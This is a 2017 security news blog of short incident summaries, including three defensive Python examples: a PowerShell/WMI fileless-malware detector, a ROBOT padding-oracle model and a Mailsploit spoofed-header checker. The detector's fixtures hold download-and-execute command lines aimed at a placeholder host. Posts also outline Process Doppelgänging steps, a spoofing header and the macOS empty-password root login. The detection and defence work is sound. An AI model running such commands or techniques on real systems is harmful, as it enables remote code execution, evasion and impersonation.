Thursday, December 28, 2017

Simple doc/poster if you want to evangelize 2FA

From Scammer to Slammer (Talk about insider theft)


Ajay Garg, an assistant programmer at India's Central Bureau of Investigation (CBI), has been arrested by his own agency for developing software that exploited vulnerabilities in the IRCTC railway ticketing system to book over 1,000 Tatkal tickets at a time.

Rather than reporting the vulnerabilities he found, Garg used them for his own gain and amassed considerable wealth by making the software available to travel agents through his accomplice Anil Gupta; the agents could then easily book Tatkal tickets for clients for a fee.

For More:
http://www.ehackingnews.com/2017/12/tatkal-ticket-scam-uncovered-cbi.html

Wednesday, December 27, 2017

Watch out: since November 2017, spoofed emails have been sent to unsuspecting users to infect their computers. The emails purport to come from commonly used printer and scanner brands.




The emails carry ordinary-looking subject lines such as "Scanned from HP", "Scanned from Canon" or "Scanned from Epson". The crooks altered file extensions and names and hid the malicious code in a way that email antivirus scanners were not detecting.

For More
https://www.hackread.com/spoofed-emails-from-printer-vendors-install-backdoor

How to avoid a data breach: just a few well-known ideas which senior security folks tend to ignore for various reasons.



This one is sure to recur more often. Business Email Compromise (BEC) attacks are those in which a cyber criminal adopts the identity of a senior executive and sends emails to staff members in an attempt to trick them into doing something they shouldn't.

  1. Don’t overlook the vulnerability of executives
  2. Reduce your data holdings
  3. Take a company-wide approach
  4. Test yourself on your response plan



For More:
http://www.telegraph.co.uk/connect/better-business/cyber-security/how-to-avoid-a-data-breach/

Android malware that can pose as not a hundred or two but nearly 2,200 banks to steal passwords and carry out fraud



2017 seems to be the year of Android malware. Here is another one: "Catelites Android Malware".

The malware can get onto an Android device in more than one way, such as via fake, malicious applications on third-party app stores or phishing websites, or bundled with other malware. Catelites can intercept texts, lock the phone, delete device data, access phone numbers, modify the speaker volume, spy on message conversations and force password unlocks.

More Here
https://www.hackread.com/catelites-android-malware-poses-as-2200-bank-apps/

I am sure you thought at least one of these (myths) was TRUE.


Thursday, December 21, 2017

Facebook Messenger users may want to read this: you might be victimized by a mining bot called Digmine


Facebook Messenger is the launching pad for a new Monero cryptocurrency-mining bot called Digmine.

Once downloaded onto a computer, Digmine first installs an autostart mechanism and launches Chrome with a malicious extension. It then starts mining and, finally, uses the friend list of the victim's Facebook account to spread itself via Messenger.

To keep the victim unaware, a video is streamed from a website controlled by the criminals, and that same site hosts the additional components the malware downloads.

For More:
https://www.scmagazine.com/digmine-cryptocurrency-botnet-spreading-through-facebook-messenger/article/720451/

Remember "He who is well prepared has half won the battle". Are you prepared to deal with fileless malware in 2018?


Fileless malware attacks using PowerShell or Windows Management Instrumentation (WMI) tools accounted for 52% of all attacks this year (2017).


Fileless malware attacks, also known as non-malware attacks, let criminals skip the steps a traditional malware attack needs, such as building a payload and dropping it onto the user's disk. Instead, attackers abuse trusted, native operating system tools such as PowerShell and WMI to run code purely in memory, often launched through web browsers and Office applications. Because nothing new is written to disk, file-based antivirus has little to inspect; the controls that do help are PowerShell script block and module logging, constrained language mode, and process-creation auditing that records the full command line of every new process.
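Fileless attacks leave no new binary to scan, so the useful telemetry is the process-creation record: who launched PowerShell or WMI, and with what command line. The following is an added example, not code from the article or from any vendor, that runs a few detection heuristics over constructed sample events. The event fields, the 203.0.113.5 address and the sample command lines are all invented for the example. It decodes the Base64/UTF-16LE payload behind `-EncodedCommand`, flags download cradles, hidden windows and WMI process creation in both the raw and the decoded text, and flags shells spawned by Office or by the WMI provider host.

```python
import base64
import re

# Constructed sample payload and events; they model Sysmon Event ID 1 /
# Windows 4688 fields (parent image, image, command line). Nothing here is
# taken from a real incident.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile Get-ChildItem C:\Users"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic process call create \"powershell -w hidden "
                "IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\""},
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

SUSPICIOUS = {
    "download-cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biwr\b", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "wmi-process-create": re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b|Win32_Process.*\bCreate\b", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if the
    switch is absent or its value is not valid Base64 of UTF-16LE text."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Score one process-creation event; 'reasons' is empty for benign events."""
    reasons = set()
    parent, image, cmdline = _basename(event["parent"]), _basename(event["image"]), event["cmdline"]
    if parent in OFFICE_PARENTS and image in SHELLS:
        reasons.add("office-spawned-shell")       # document macro / DDE / exploit landing
    if parent == "wmiprvse.exe":
        reasons.add("wmi-spawned-process")        # remote WMI execution lands here
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.add("encoded-command")
    text = cmdline + ("\n" + decoded if decoded else "")   # match on raw and decoded text
    for name, pattern in SUSPICIOUS.items():
        if pattern.search(text):
            reasons.add(name)
    return {"cmdline": cmdline, "decoded": decoded, "reasons": sorted(reasons)}


def flagged(events):
    return [r for r in map(analyze, events) if r["reasons"]]


if __name__ == "__main__":
    for r in flagged(SAMPLE_EVENTS):
        print(r["reasons"], r["decoded"] or r["cmdline"])
```

The heuristics are deliberately simple string matches; in production they belong in a SIEM rule fed by 4688 or Sysmon with command-line auditing switched on, and the decoded payload is what you hand to the analyst, since the Base64 blob on its own tells them nothing.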

For More:
https://www.darkreading.com/perimeter/fileless-malware-attacks-hit-milestone-in-2017/d/d-id/1330691

Is your Apple iPhone slow? No worries, it is a feature Apple added without bothering to notify users



Apple has finally admitted that it does indeed intentionally slow down older iPhone models.


Apple says it is a feature, implemented on the iPhone 6, 6S and SE last year during a software update and on the iPhone 7 in December with the release of iOS 11.2, meant to stop older iPhones with aging batteries from shutting down unexpectedly and to prolong their lifespan.


Apple's statement came in response to a blog post published earlier this week by John Poole, the Toronto-based developer of Geekbench, who analysed the performance of the iPhone 6S and iPhone 7 over time.

For More
https://thehackernews.com/2017/12/old-iphone-slow.html

Wednesday, December 20, 2017

300,000 active WordPress sites could have a hidden backdoor. Hope your site is not one of them.



BestWebSoft sold its popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

While reviewing the source code of the Captcha plugin, the Wordfence team found a severe backdoor that could allow the plugin author, or attackers, to gain administrative access to WordPress sites remotely without any authentication. A change of plugin ownership is a supply-chain event: if you run this plugin, check which version is installed and whether the maintainer has changed.

For More:
https://thehackernews.com/2017/12/wordpress-security-plugin.html

Tuesday, December 19, 2017

Cyber Threat Intelligence (CTI): types and uses



Tactical CTI: 
This form of CTI answers the "what" of a cyber incident and consists largely of indicators: bad IP addresses, URLs, file hashes, known malicious domain names and so on. It is machine-consumable and short-lived.

Operational CTI: 
This form of intelligence analyses and profiles threat actors and adversaries, the "who" behind the attacks, together with their tools and techniques. While still fairly short-term in nature, operational CTI requires human analysis.

Strategic CTI: 
Strategic CTI is long-term and takes a geopolitical view, analysing risk factors such as global events, foreign policy and other local and international movements and agendas that can affect your organization's safety. It is the most difficult type of intelligence to generate.


For More:

https://www.darkreading.com/attacks-breaches/comprehensive-endpoint-protection-requires-the-right-cyber-threat-intelligence/a/d-id/1330623

What is the market for stolen passwords?



In just the first seven months of 2017, one botmaster sold approximately 35,000 credential pairs, earning more than $288,000; almost 9,000 different customers bought one or more of his username and password pairs.


For More:
https://krebsonsecurity.com/2017/12/the-market-for-stolen-account-credentials/

Friday, December 15, 2017

Free (updated) Memory Forensics Cheat Sheet from SANS

What more can I say: more than nine in ten Americans (94%) in a new survey have heard news stories about security breaches, yet 43% have not changed their online habits at all.


37% of respondents said they think it's likely their personal information will be stolen
(it gets better, read below)

However,
  1. 43% have not changed their online habits at all.
  2. 25% have implemented two-factor authentication.
  3. 56% of Americans have used a password to lock their computer.
  4. 45% use a PIN to lock their mobile devices.
  5. 19% of Americans reported use of biometrics.


Thursday, December 14, 2017

Are you using Azure AD Connect? If so, you need to know this



A permissions flaw in Microsoft's Azure AD Connect software could allow a rogue admin to escalate account privileges and gain unauthorized universal access within a company's internal network.

The flaw lets trusted users with limited or temporary privileges within a domain, such as the ability to reset passwords or add users to administrative groups, escalate to full privileges: those same rights apply to the highly privileged synchronization account that Azure AD Connect creates in on-premises Active Directory, so whoever can reset that account's password can act as it.

Microsoft didn't release a patch to fix the bug; instead it made available a PowerShell script that tightens the permissions on that account. If you run Azure AD Connect, check the ACL on its synchronization account rather than assuming the installer locked it down.

For More:
https://threatpost.com/permissions-flaw-found-azure-ad-connect/129170/

What is wrong with this web page belonging to NatWest Bank?

 (Hint: it starts with "Not")




For More:
http://www.bbc.co.uk/news/technology-42353478

Have you enabled MFA for your account? Because someone found 1.4 billion usernames and passwords in clear text


The collective database contains plain text credentials leaked from Bitcoin, Pastebin, LinkedIn, MySpace, Netflix, YouPorn, Last.FM, Zoosk, Badoo, RedBox, games like Minecraft and Runescape, and credential lists like Anti Public, Exploit.in.


"None of the passwords are encrypted, and what's scary is that we've tested a subset of these passwords and most of them have been verified to be true," Casal said.


For More:
https://thehackernews.com/2017/12/data-breach-password-list.html

ROBOT attack? Not the Isaac Asimov kind; it's about encryption



ROBOT: Return Of Bleichenbacher's Oracle Threat

Bleichenbacher's attack was first published in 1998. It is an adaptive chosen-ciphertext attack on RSA PKCS#1 v1.5: if a TLS server reveals, through a different error, alert or timing, whether a submitted ClientKeyExchange decrypted to correctly padded data, an attacker can use the server as an oracle to decrypt recorded RSA-key-exchange sessions, or to sign data with the server's private key, without ever obtaining that key. ROBOT showed in 2017 that, nineteen years on, many TLS stacks still leaked such an oracle.

The researchers found that some of the best-known sites on the Internet, including Facebook and PayPal, were affected by the ROBOT attack. The practical fix is to disable RSA key-exchange cipher suites (the ones whose names start with TLS_RSA_) in favour of ECDHE suites, which also gives forward secrecy; vendor patches address the oracle itself.
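The oracle in a Bleichenbacher attack is any server behaviour that tells the client whether the RSA-decrypted ClientKeyExchange had valid PKCS#1 v1.5 padding. The block below is an added example, not the ROBOT researchers' code and not a TLS implementation: it models the server-side step that follows RSA decryption, first in the naive form that fails differently for each defect, then in the form RFC 5246 section 7.4.7.1 prescribes, where a random premaster secret is chosen in advance and silently substituted on any failure so that the handshake looks the same to the peer and only the Finished check fails. The `distinguishable` helper plays the attacker watching for differing outcomes. The premaster secret and padding are constructed for the example, and the RSA operation itself is omitted.

```python
import secrets

PMS_LEN = 48                      # TLS premaster secret: 2 version bytes + 46 random
VERSION = b"\x03\x03"             # client_version for TLS 1.2
PMS = VERSION + bytes(range(46))  # constructed premaster secret for the example


class PaddingError(Exception):
    """Raised by the naive implementation; every distinct message is an oracle."""


def pkcs1_v15_wrap(pms, k):
    """EME-PKCS1-v1_5 encoding of pms for a k-byte modulus:
    00 02 <at least 8 non-zero random bytes> 00 <pms>."""
    pad_len = k - 3 - len(pms)
    if pad_len < 8:
        raise ValueError("modulus too small for this message")
    padding = bytes(b or 1 for b in secrets.token_bytes(pad_len))   # no zero bytes
    return b"\x00\x02" + padding + b"\x00" + pms


def unwrap_vulnerable(block, client_version):
    """Stop at the first defect. Distinct errors (or timings) at each step
    leak which check failed: exactly the oracle Bleichenbacher needs."""
    if len(block) < 11 or block[:2] != b"\x00\x02":
        raise PaddingError("bad block type")
    sep = block.find(b"\x00", 2)
    if sep == -1:
        raise PaddingError("no separator")
    if sep < 10:
        raise PaddingError("padding string shorter than 8 bytes")
    pms = block[sep + 1:]
    if len(pms) != PMS_LEN:
        raise PaddingError("wrong premaster secret length")
    if pms[:2] != client_version:
        raise PaddingError("version mismatch")
    return pms


def unwrap_hardened(block, client_version):
    """RFC 5246 7.4.7.1: pick a random 48-byte secret before looking at the
    block, fold every check into one flag, and return the random secret on
    any failure. Nothing is raised and the result is always 48 bytes, so the
    peer sees a normal handshake that fails at Finished. (Python cannot
    promise constant time; the branch-free structure is the point.)"""
    fallback = secrets.token_bytes(PMS_LEN)
    sep = block.find(b"\x00", 2)
    candidate = block[sep + 1:] if sep != -1 else b""
    ok = len(block) >= 11
    ok &= block[:2] == b"\x00\x02"
    ok &= sep >= 10
    ok &= len(candidate) == PMS_LEN
    ok &= candidate[:2] == client_version
    return candidate if ok else fallback


def distinguishable(unwrap, good_block, bad_block, client_version):
    """The attacker's view: does the server behave differently for a valid and
    an invalid block? Here the observable is the exception channel; in the
    real ROBOT work it was TLS alerts, connection resets and timing."""
    def outcome(block):
        try:
            unwrap(block, client_version)
            return "completed"
        except PaddingError as e:
            return f"error: {e}"
    return outcome(good_block) != outcome(bad_block)


if __name__ == "__main__":
    good = pkcs1_v15_wrap(PMS, 128)
    bad = b"\x00\x01" + good[2:]
    print("naive leaks:", distinguishable(unwrap_vulnerable, good, bad, VERSION))
    print("hardened leaks:", distinguishable(unwrap_hardened, good, bad, VERSION))
```

Note what the hardened version does not do: it does not try to hide the failure by returning an error late, or by returning a fixed value. Either of those would still be distinguishable from the genuine case; the only safe behaviour is one the peer cannot tell apart from a successful decryption until the Finished MAC fails.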


For More:
http://www.hackersnewsbulletin.com/2017/12/robot-attacks-rediscovered.html

Friday, December 8, 2017

Is it Cayla doll or should we call it Creepy doll?




It turns out that anybody within about nine metres of the toy, even outside the building, can pair a mobile phone to it over Bluetooth without logging in: no PIN is required and no button on the toy needs to be pressed.

If you then call the phone that was sneakily paired with the toy, what you say into the calling phone is relayed by the paired phone to the toy, and the toy's microphone carries the reply back, which effectively gives a two-way conversation.


For More:
https://nakedsecurity.sophos.com/2017/12/06/cayla-doll-too-eavesdroppy-to-put-under-the-christmas-tree-says-france/

Thursday, December 7, 2017

What the security folks always feared: memory-based malware (no files). Process Doppelgänging (PoC)



Process Doppelgänging works on all Windows versions

The attack works on all modern versions of Microsoft Windows, from Windows Vista to the latest build of Windows 10.

According to the researchers, Process Doppelgänging is a fileless attack and works in four major steps:


  1. Transact: open a legitimate executable inside an NTFS transaction (TxF) and, within that transaction, overwrite it with the malicious file.
  2. Load: create a memory section from the modified (malicious) file while the transaction is still open.
  3. Rollback: roll the transaction back (deliberately fail it), which discards every change to the legitimate executable as if it had never happened; the file on disk is untouched.
  4. Animate: bring the doppelgänger to life. Use the older Windows process-creation path, which builds a process from an existing section, with the section created in step 2. The code that runs is malicious but was never saved to disk, "making it invisible to most recording tools such as modern EDRs."

Because the technique relies on documented NTFS transaction and legacy process-creation APIs rather than on a bug, there is no patch to apply; the defence is detection, for example flagging a section created from a transacted file that is then rolled back, or a running process whose mapped image does not match the file its path points to.



For More:
https://thehackernews.com/2017/12/malware-process-doppelganging.html

Bank of America, HSBC or TunnelBear customers may want to take a look at this


Researchers from the UK have uncovered a serious vulnerability in the way nine banking and VPN apps handle encrypted communication that puts tens of millions of users at risk of man-in-the-middle (MitM) attacks. The apps pinned the certificate authority they expected but skipped hostname verification, so any certificate issued by that CA, for any site, was accepted as the bank's.

"Our tests find that apps from some of the world's largest banks contain the flaw, which if exploited, could enable an attacker to decrypt, view and modify traffic - including log-in credentials - from the users of the app," write Chris McMahon Stone, Tom Chothia, and Flavio Garcia of the University of Birmingham.

For More:
https://www.darkreading.com/mobile/man-in-the-middle-flaw-in-major-banking-vpn-apps-exposes-millions/d/d-id/1330586?_mc

Tuesday, December 5, 2017

BEC - Business Email Compromise - Stats and Solution

5 computer security facts that surprise most people (including some IT Security Folks)



  1. Every company is hacked
  2. Most companies don’t know the way they are successfully attacked the most
  3. A criticality gulf exists between real and perceived threats
  4. Firewalls and antivirus software aren’t that important
  5. Two problems account for almost 100 percent of the risk (unpatched software and social engineering)


Remember: Most risks can be reduced with the following

  • Patch regularly
  • Use non-admin / root accounts for regular activities
  • Think before you CLICK
  • Never give away sensitive information over email or phone unless you initiated the contact using details you looked up yourself from a reliable source



For More:
https://www.csoonline.com/article/3239644/data-breach/5-computer-security-facts-that-surprise-most-people.html#tk.twt_cso

Are you using one of the 33 email clients that could be exploited by Mailsploit?


German security researcher Sabri Haddouche has discovered a set of vulnerabilities that he collectively refers to as Mailsploit, which allow an attacker to spoof email identities and, in some cases, run malicious code on the user's computer.



The real issue is the email spoofing attack, which circumvents all modern anti-spoofing protection such as DMARC (built on DKIM and SPF) and various spam filters. The trick is in how the From header is encoded: RFC 1342/2047 encoded-words let non-ASCII text be carried in a header, and the affected clients decode them without sanitising the result, so a header whose encoded part decodes to a forged address followed by a null byte or newline is displayed as the forged address, while the domain the filters actually authenticated is the attacker's own. DMARC is not broken here; the clients rendering the header are.
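A mail gateway cannot fix the clients, but it can refuse to deliver From headers built this way. The block below is an added example, not Haddouche's proof of concept and not from any mail product: it decodes a From header with Python's standard library exactly as a client would, then applies three heuristics, flagging encoded-words that contain an address, control characters in the decoded result, and a mismatch between the domain a NUL-truncating client would display and the domain that really follows the last "@" in the raw header. Both sample headers are constructed for the example; the spoofed one follows the Mailsploit pattern.

```python
import base64
import re
from email.errors import HeaderParseError
from email.header import decode_header

# Constructed headers. The spoofed one carries a base64 encoded-word that
# decodes to a forged address, a Q-encoded NUL, and then the real domain.
BENIGN_FROM = "=?utf-8?q?Ren=C3=A9e_M=C3=BCller?= <renee@example.com>"
FORGED = base64.b64encode(b"potus@whitehouse.gov").decode("ascii")
SPOOFED_FROM = f"=?utf-8?b?{FORGED}?==?utf-8?Q?=00?=@mailsploit.com"

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def decode_from_header(raw):
    """Decode RFC 2047 encoded-words the way a mail client does and return
    the header as one string, control characters included."""
    parts = []
    for chunk, charset in decode_header(raw):
        if isinstance(chunk, bytes):
            parts.append(chunk.decode(charset or "ascii", errors="replace"))
        else:
            parts.append(chunk)
    return "".join(parts)


def _domain(addr_text):
    """Domain of the addr-spec in a display string ('' if there is none)."""
    text = addr_text.strip()
    if text.endswith(">") and "<" in text:
        text = text[text.rfind("<") + 1:-1]
    return text.rsplit("@", 1)[-1].lower() if "@" in text else ""


def check_from_header(raw):
    """Return sorted findings; an empty list means the header looks ordinary."""
    findings = set()
    try:
        chunks = decode_header(raw)
    except HeaderParseError:
        return ["undecodable-encoded-word"]
    for chunk, charset in chunks:
        # A display name may need encoding; an address never does.
        if charset is not None and isinstance(chunk, bytes) and b"@" in chunk:
            findings.add("address-in-encoded-word")
    decoded = decode_from_header(raw)
    if CONTROL_CHARS.search(decoded):
        findings.add("control-char-in-decoded-header")
    # A client that stops rendering at the NUL shows only the forged part;
    # compare that with the domain after the last '@' of the raw header,
    # which is what SPF/DKIM/DMARC evaluation saw.
    rendered = decoded.split("\x00")[0]
    if _domain(rendered) != _domain(raw):
        findings.add("rendered-domain-mismatch")
    return sorted(findings)


if __name__ == "__main__":
    for header in (BENIGN_FROM, SPOOFED_FROM):
        print(repr(decode_from_header(header)), check_from_header(header))
```

The benign header, a legitimately encoded non-ASCII display name, produces no findings, while the spoofed one trips all three checks; any one of them is reason enough to quarantine the message at the gateway.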



The full list is given here:
https://docs.google.com/spreadsheets/d/1jkb_ZybbAoUA43K902lL-sB7c1HMQ78-fhQ8nowJCQk/htmlview?sle=true




For More:
https://blog.knowbe4.com/mailsploit-bypasses-dmarc-and-lets-attackers-send-spoofed-phishing-emails-on-over-33-email-clients

Could this be true, or is it scaremongering? 100,000-strong botnet built on router 0-day could strike at any time



What sets this latest variant apart is its ability to exploit a recently discovered zero-day vulnerability to infect two widely used lines of home and small-office routers, even when they are secured with strong passwords or have remote administration turned off altogether. A strong password does nothing against a bug that is exploitable without logging in; only a firmware fix, or keeping the vulnerable service unreachable from the Internet, helps.




More Here:
https://arstechnica.com/information-technology/2017/12/100000-strong-botnet-built-on-router-0-day-could-strike-at-any-time

Monday, December 4, 2017

Malware (called Troubleshooter) now performs (fake) tech-support functions.



It presents a fake BSOD (Blue Screen of Death) that appears to lock the user out. Then a "troubleshooting wizard" pops up, masquerading as a Windows utility. It detects "issues" on the PC and recommends that the victim pay $25 via PayPal for a package called Windows Defender Essentials to take care of them.

Malwarebytes said that it is spreading via a cracked software installer that loads various files, including the malware. Troubleshooter then registers itself as a Windows service.

If a victim pays the $25, they are redirected to a "thank you" web page and the malware terminates.

For More
https://www.infosecurity-magazine.com/news/tech-support-scam-malware-fake?utm_source=twitterfeed&utm_medium=twitter

Friday, December 1, 2017

Stats for risk-based security: IT professionals listed sysadmins as the biggest threat (42%), followed by C-level executives (16%).

While these executives typically have limited IT skills, their credentials are worth more to hackers than those of any other group.

Other targets:


  1. Social engineering: HR and finance departments are the easiest targets.
  2. Insider risk: IT staff.


For More:
https://www.infosecurity-magazine.com/news/it-staff-blame-themselves-for/

Could you be one of those 40,000 consumers whose sensitive data was exposed (NOT stolen)?



Some 111GB of highly sensitive information, including consumer credit histories, has been exposed by the National Credit Federation as the result of yet another misconfigured Amazon Web Services (AWS) S3 storage bucket.


Although the leak affected only around 40,000 consumers, the data concerned is highly sensitive, including credit reports from the big three agencies: Equifax, Experian and TransUnion.


What is the most common response by organizations? Add yet another data or alert feed, don't spend time filtering and prioritizing it, and eventually ignore it. Did that resolve the issue? For S3 the fix is boring: audit every bucket policy and ACL for grants to AllUsers or AuthenticatedUsers, and treat any such grant as an incident.

More Here
https://www.infosecurity-magazine.com/news/100gb-secret-consumer-credit-data

Thursday, November 30, 2017

Remember: To Err is human, blaming it on others is EVEN MORE human.



While 62% of consumers feel businesses are responsible for data security, many have their own poor security hygiene. For instance, 41% fail to take advantage of security measures available to them, such as two-factor authentication for social media accounts. In addition, more than half (56%) still use the same password for multiple online accounts.

“Consumers are evidently happy to relinquish the responsibility of protecting their data to a business, but are expecting it to be kept secure without any effort on their part,”

For More:
https://www.infosecurity-magazine.com/news/consumers-overwhelmingly-blame?utm_source=twitterfeed&utm_medium=twitter

Good news - Firefox to add "Breach Alerts"



Firefox is testing a warning system that will notify users when they visit breached sites and offer the option to be notified if a site they previously visited is breached in the future.

The "Breach Alerts" will not prevent a user from visiting a site but will give them some idea that the site's security is less than optimal, using data provided by Have I Been Pwned?.

For More:
https://www.scmagazine.com/firefox-browser-tests-notifications-to-alert-users-when-visiting-breached-sites/article/710711/

HP (once a great company) installs telemetry software without the user's permission and sends data back once a day.



HP customers also complained that the installation slowed down their systems significantly.



"So today all of a sudden, I'm experiencing a considerable slowdown in my laptop (Pavilion P3V59PA). Once I look for the problem in Task Manager, I found out that the program called HP Touchpoint Analytics Client (and its subsequent follow up) constantly jum ping the memory usage (~300Mb at a minimum, ~nearly 2Mb at maximum). I don't remember ever installing this program whatsoever, and in control panel, I found that for some reason this program was silently installed today, without my consent."
For More:
https://thehackernews.com/2017/11/hp-computers-telemetry-data.html

Wednesday, November 29, 2017

Another reason to use MFA (Multi-Factor Authentication): 77% of the FTSE 100 were exposed


If they had enabled multi-factor authentication (MFA), the risk associated with these leaked credentials would have been low or minimal.

77% of the FTSE 100 were exposed, with an average of 218 usernames and passwords stolen, published or sold per company.

A significant number of credentials linked to FTSE 100 organisations were still compromised three months after the discovery.


For More:
https://blog.knowbe4.com/77-of-the-ftse-100-have-compromised-credentials-what-is-your-stolen-password-percentage

Tuesday, November 28, 2017

Crime-as-a-service (CaaS) is among the top five global security threats that businesses will face in 2018.



The rest are

  1. The Internet of Things (IoT)
  2. Supply chain risk
  3. Regulatory complexity
  4. Unmet board expectations (this one could be the hardest to resolve)


For More:
https://www.infosecurity-magazine.com/news/isf-top-2018-threats

Root access without a password in macOS?



Sometimes fact is stranger than fiction.

A new bug in Apple's operating system macOS allows anyone to become an admin by entering "root" as the login name with an empty password and pressing enter.

Several information security professionals confirmed to Motherboard that they could reproduce the bug on macOS 10.13 (High Sierra), the latest version of the operating system.


This bug allows any user logged into macOS to authenticate as root without entering an admin password, and if the Mac has more than one user account the attack works even when the computer is locked.

The bug also lets someone change other users' passwords, since it unlocks the system keychain. Until the fix is applied, the workaround is to set a password on the root account.

For More:
https://motherboard.vice.com/en_us/article/3kvxg5/apple-mac-bug-root-admin-without-password

Monday, November 27, 2017

Ever heard of "Golden SAML"? It is a technique for compromising SAML-based SSO


The prerequisites for this are heavy; however, the returns for the attacker could be great.


It could allow an attacker to forge enterprise user identities and forge authentication to gain access to valuable cloud resources in a federated environment.

"Golden SAML poses serious risk because it allows attackers to fake an identity and forge authentication to any cloud app (Azure, AWS, vSphere, etc.) that supports SAML authentication. Using this post-exploit technique, attackers can become any user they want to be – with the highest level of privileges – and gain approved, federated access to a targeted app," researchers wrote.

The prerequisites of such attacks, however, are considerable. The attacker must already have compromised the federation server: they need the token-signing private key that Active Directory Federation Services uses to sign SAML objects, the identity provider (IdP) public certificate and IdP name, and an AD FS user account. In short, this is a post-exploitation technique that turns a compromise of AD FS into durable access to every relying party, independent of the user's password and MFA, because the service provider checks only the signature. Recovery means rolling the token-signing certificate, not just resetting passwords.

For More
https://threatpost.com/saml-post-intrusion-attack-mirrors-golden-ticket/128993/

If you are using a ZyXEL device and haven't changed the default password, your device might be compromised



There has been an uptick in botnet activity associated with a variant of Mirai. Targeted are ports 23 and 2323 (Telnet) on internet-connected devices made by ZyXEL Communications that are still using default credentials.

In October 2016, the Mirai malware spread to IoT devices by logging in with default usernames and passwords. The malware then roped the affected devices into a botnet that carried out distributed denial-of-service (DDoS) attacks. Beyond changing the password, make sure Telnet is not reachable from the Internet at all.


For More:
https://threatpost.com/newly-published-exploit-code-used-to-spread-marai-variant/128998/

Wednesday, November 22, 2017

OWASP Top 10 - 2017 has three new additions



Making its first appearance in OWASP's Top 10 is a category dubbed XML External Entities (XXE), which covers older or poorly configured XML processors that resolve external entity references in untrusted XML. Data gathered from source code analysis tools supported the inclusion of XXE as a new category, according to OWASP.

The two other new additions to the list are insecure deserialization, which can enable remote code execution on affected platforms, and insufficient logging and monitoring.

PDF version here:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

UBER: not only did they have a data breach, they also paid a ransom to keep it secret


The $100K Question would be - Did the hackers really delete the data?

Instead of disclosing the breach, the company paid $100,000 in ransom to the two hackers who had access to the data, in exchange for keeping the incident secret and deleting the information.


For More:
https://thehackernews.com/2017/11/uber-hack-data-breach.html

Tuesday, November 21, 2017

Google: we don't need your permission to collect your location information



Google has been caught collecting location data from every Android device since the beginning of this year (that is, for the past 11 months), even when location services are entirely disabled.

All it needs is for your Android device to be connected to the Internet.

Each time your Android device comes within range of a new cell tower, it gathers the tower's address and sends this data back to Google when the device is connected to a WiFi network or has cellular data enabled.

For More:
https://thehackernews.com/2017/11/android-location-tracking.html

Black Friday Deals - Here are 6 real phishing emails (that you might receive or already received)





  1. Ray-Ban 80% Discount Sale
  2. Neuberger Berman Gift Card Perk
  3. Free Apple iPhone 6
  4. Americanas 60% Laptop Sale
  5. Free Preloaded Amazon Gift Card
  6. Michael Kors 80% Handbag Sale



For More:
https://www.darkreading.com/mobile/6-real-black-friday-phishing-lures/d/d-id/1330468?image_number=7

Monday, November 20, 2017

SCARY STUFF: Over 400 of the World's Most Popular Websites Record Your "EVERY KEYSTROKE"



Session replay scripts are used by companies to gain insight into how their customers are using their sites and to identify confusing webpages. But the scripts don’t just aggregate general statistics, they record and are capable of playing back individual browsing sessions. The scripts don’t run on every page, but are often placed on pages where users input sensitive information, like passwords and medical conditions. 



Research from Princeton University released last week indicates that online tracking is far more invasive than most users understand

Some highly-trafficked sites run software that records every time you click and every word you type. If you go to a website, begin to fill out a form, and then abandon it, every letter you entered in is still recorded.

For More:
https://motherboard.vice.com/en_us/article/59yexk/princeton-study-session-replay-scripts-tracking-you

Do you have Lollipop, Marshmallow or Nougat (I mean the Android OS versions, NOT those tasty eatables)? Then you should read this: it seems 77.5% of Android devices are at risk.



Since a majority of Android devices run one of these three versions, around 77.5% of Android devices are affected.

The MediaProjection service, which is designed to capture the user's screen and record system audio, can be exploited because of a critical flaw.


Android's MediaProjection service has existed for a long time, but apps used to need root access, or to be signed with the device's release keys, in order to use it.
When Android 5.0 Lollipop was released, Google opened the service to all apps without protecting it with a dedicated permission; the only safeguard is a system pop-up asking the user to allow screen capture, and that pop-up can be covered by an overlay so the user taps "allow" without ever seeing it (tap-jacking).

For More
https://www.hackread.com/android-flaw-lets-attacker-capture-screen-record-audio/


(Privacy) Gone with the wind - More than 200 Indian government websites expose citizens' key personal details



The irony is that the Indian government has made it mandatory for every Indian citizen to get their Aadhaar ID to avail of various social welfare schemes and government services

